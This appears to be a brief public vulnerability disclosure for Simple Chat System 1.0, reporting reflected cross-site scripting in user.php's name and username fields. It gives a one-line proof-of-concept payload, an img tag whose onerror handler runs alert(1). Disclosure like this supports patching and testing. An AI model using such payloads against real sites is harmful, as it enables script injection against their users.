Simple Chat System version 1.0 suffers from a cross site scripting vulnerability.
ce97d4c23068feb8bbe8521655c316c4b069e124af31c5a63ff93f961e69dd83
#Exploit Title:Simple Chat System 1.0
#Reflected XSS
#Date:05/12/2024
#Exploit Author:Merve Hatice Arslan
#Vendor Homepage:https://code-projects.org/simple-chat-system/
#Sofware Link:https://download.code-projects.org/details/ec6340ea-ef68-48d9-b9b2-da397f52b2dc
#Version:1.0
#Tested on:Linux / XAMPP
#Scripting (XSS) in user.php via the name and username fields.
#Payload:<img src=1 href=1 onerror="javascript:alert(1)"></img>